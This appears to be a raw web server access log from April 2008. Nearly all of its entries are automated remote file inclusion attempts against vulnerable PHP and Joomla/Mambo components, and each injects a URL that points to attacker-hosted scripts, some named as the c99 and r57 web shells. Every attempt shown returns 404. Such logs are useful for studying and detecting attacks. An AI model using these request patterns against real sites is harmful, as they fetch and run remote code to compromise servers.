72.5.54.87 - - [06/Apr/2008:19:16:51 -0600] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
81.223.126.82 - - [06/Apr/2008:19:17:12 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
81.223.126.82 - - [06/Apr/2008:19:17:12 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
81.223.126.82 - - [06/Apr/2008:19:17:29 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
81.223.126.82 - - [06/Apr/2008:19:17:30 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
207.58.135.90 - - [06/Apr/2008:19:17:55 -0600] "GET /index.php?page=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
207.58.135.90 - - [06/Apr/2008:19:17:55 -0600] "GET /logs/index.php?page=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
87.238.162.240 - - [06/Apr/2008:19:17:56 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
87.238.162.240 - - [06/Apr/2008:19:17:56 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
213.173.177.11 - - [06/Apr/2008:19:18:10 -0600] "GET /logs/access_log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.76"
140.120.27.17 - - [06/Apr/2008:19:19:35 -0600] "GET /logs//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:19:36 -0600] "GET //ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:19:38 -0600] "GET /logs//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:19:39 -0600] "GET //ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
83.68.228.146 - - [06/Apr/2008:19:20:28 -0600] "GET /logs/access_log.20080120/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
83.68.228.146 - - [06/Apr/2008:19:20:28 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
83.68.228.146 - - [06/Apr/2008:19:20:28 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
81.223.85.250 - - [06/Apr/2008:19:21:07 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
81.223.85.250 - - [06/Apr/2008:19:21:07 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
140.120.27.17 - - [06/Apr/2008:19:21:44 -0600] "GET /logs/access_log//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:21:44 -0600] "GET //ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:21:44 -0600] "GET /logs//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:21:46 -0600] "GET /logs/access_log//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:21:46 -0600] "GET //ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:21:47 -0600] "GET /logs//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
58.120.225.104 - - [06/Apr/2008:19:22:14 -0600] "GET /logs/access_log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:22:15 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:22:15 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:22:20 -0600] "GET /logs/access_log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:22:21 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:22:21 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
200.105.35.14 - - [06/Apr/2008:19:23:12 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
200.105.35.14 - - [06/Apr/2008:19:23:12 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
200.105.35.14 - - [06/Apr/2008:19:23:30 -0600] "GET /logs/ashnews.php?pathtoashnews=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
200.105.35.14 - - [06/Apr/2008:19:23:30 -0600] "GET /ashnews.php?pathtoashnews=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
64.207.204.13 - - [06/Apr/2008:19:24:44 -0600] "GET /logs/error_log.20080127//modules/xfsection/modify.php?dir_module=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:19:24:44 -0600] "GET //modules/xfsection/modify.php?dir_module=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:19:24:44 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
213.215.80.102 - - [06/Apr/2008:19:25:04 -0600] "GET /logs/error_log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
80.67.24.32 - - [06/Apr/2008:19:25:57 -0600] "GET /logs/access_log.20080120/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
80.67.24.32 - - [06/Apr/2008:19:25:58 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
80.67.24.32 - - [06/Apr/2008:19:25:58 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
80.67.24.32 - - [06/Apr/2008:19:26:14 -0600] "GET /logs/access_log.20080120/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
80.67.24.32 - - [06/Apr/2008:19:26:14 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
80.67.24.32 - - [06/Apr/2008:19:26:15 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
85.37.186.93 - - [06/Apr/2008:19:26:56 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
88.208.231.141 - - [06/Apr/2008:19:27:07 -0600] "GET /logs/access_log.20080316/modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
88.208.231.141 - - [06/Apr/2008:19:27:08 -0600] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
88.208.231.141 - - [06/Apr/2008:19:27:08 -0600] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
85.234.133.218 - - [06/Apr/2008:19:29:00 -0600] "GET /modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 234 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
85.234.133.218 - - [06/Apr/2008:19:29:00 -0600] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 239 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
74.220.215.233 - - [06/Apr/2008:19:29:45 -0600] "GET /logs/access_log.20080127/template.php?pagina=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:19:29:45 -0600] "GET /template.php?pagina=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:19:29:45 -0600] "GET /logs/template.php?pagina=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
85.37.186.93 - - [06/Apr/2008:19:30:07 -0600] "GET /logs/access_log.20080106//components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.37.186.93 - - [06/Apr/2008:19:30:07 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
85.37.186.93 - - [06/Apr/2008:19:30:08 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
74.220.215.233 - - [06/Apr/2008:19:32:27 -0600] "GET /logs/access_log/template.php?pagina=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
64.207.204.13 - - [06/Apr/2008:19:32:29 -0600] "GET /logs//ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:19:32:29 -0600] "GET //ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
80.67.24.32 - - [06/Apr/2008:19:32:38 -0600] "GET /logs/access_log.20080203/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
85.114.135.126 - - [06/Apr/2008:19:32:39 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
64.207.204.13 - - [06/Apr/2008:19:33:17 -0600] "GET /logs/access_log//ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:19:33:17 -0600] "GET //ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:19:33:17 -0600] "GET /logs//ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
58.120.225.104 - - [06/Apr/2008:19:35:29 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:35:29 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:35:30 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:35:33 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:35:34 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:35:34 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:35:48 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:35:51 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
72.89.191.68 - - [06/Apr/2008:19:38:53 -0600] "GET /logs/error_log.20080330//templates/mangobery/footer.sample.php?Site_Path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
72.89.191.68 - - [06/Apr/2008:19:38:53 -0600] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
72.89.191.68 - - [06/Apr/2008:19:38:53 -0600] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
72.89.191.68 - - [06/Apr/2008:19:41:05 -0600] "GET /logs/error_log//templates/mangobery/footer.sample.php?Site_Path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:41:07 -0600] "GET /logs/error_log.20080330///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 307 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:41:07 -0600] "GET ///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:41:07 -0600] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:41:09 -0600] "GET /logs/error_log.20080330///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 307 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:41:10 -0600] "GET ///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:41:10 -0600] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
212.174.24.65 - - [06/Apr/2008:19:42:14 -0600] "GET /logs/main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
212.174.24.65 - - [06/Apr/2008:19:42:14 -0600] "GET /main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:19:42:19 -0600] "GET /logs/error_log.20080330/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:19:42:19 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:19:42:19 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
85.114.135.126 - - [06/Apr/2008:19:42:46 -0600] "GET /logs/error_log.20080330/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.114.135.126 - - [06/Apr/2008:19:42:46 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
140.120.27.17 - - [06/Apr/2008:19:43:11 -0600] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:43:12 -0600] "GET //skin/zero_vote/error.php?dir=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:43:12 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
74.6.22.170 - - [06/Apr/2008:19:45:12 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.9.99 - - [06/Apr/2008:19:45:14 -0600] "GET /logs/?S=A HTTP/1.0" 200 1213 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.220.215.233 - - [06/Apr/2008:19:45:29 -0600] "GET /logs/access_log.20080203/main.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:19:45:29 -0600] "GET /main.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:19:45:29 -0600] "GET /logs/main.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.808"
74.52.169.116 - - [06/Apr/2008:19:46:52 -0600] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
74.52.169.116 - - [06/Apr/2008:19:46:52 -0600] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
74.6.22.87 - - [06/Apr/2008:19:46:54 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.26.23 - - [06/Apr/2008:19:46:59 -0600] "GET /logs/access_log.20080406 HTTP/1.0" 200 540672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
140.120.27.17 - - [06/Apr/2008:19:47:36 -0600] "GET /logs//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:47:36 -0600] "GET //ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:47:38 -0600] "GET /logs//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
140.120.27.17 - - [06/Apr/2008:19:47:41 -0600] "GET //ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
67.195.51.190 - - [06/Apr/2008:19:47:45 -0600] "GET / HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.108.66.169 - - [06/Apr/2008:19:49:03 -0600] "GET /logs/error_log.20080127//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:49:04 -0600] "GET /logs/error_log.20080127//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:49:04 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:49:04 -0600] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:49:04 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:49:04 -0600] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:49:55 -0600] "GET /logs/access_log.2008020316//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:49:56 -0600] "GET /logs/access_log.2008020316//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:49:56 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:49:56 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:49:56 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:49:57 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
67.195.52.109 - - [06/Apr/2008:19:50:09 -0600] "GET /?M=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.37 - - [06/Apr/2008:19:50:19 -0600] "GET /?D=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.191.104.52 - - [06/Apr/2008:19:50:27 -0600] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
64.191.104.52 - - [06/Apr/2008:19:50:27 -0600] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
81.89.137.99 - - [06/Apr/2008:19:50:42 -0600] "GET /logs/error_log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
212.174.24.65 - - [06/Apr/2008:19:51:34 -0600] "GET /logs/access_log.20080203/main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
212.174.24.65 - - [06/Apr/2008:19:51:34 -0600] "GET /main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
212.174.24.65 - - [06/Apr/2008:19:51:34 -0600] "GET /logs/main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
195.74.65.15 - - [06/Apr/2008:19:51:44 -0600] "GET /logs/[Scriptftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
195.74.65.15 - - [06/Apr/2008:19:51:44 -0600] "GET /logs/[Scriptftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
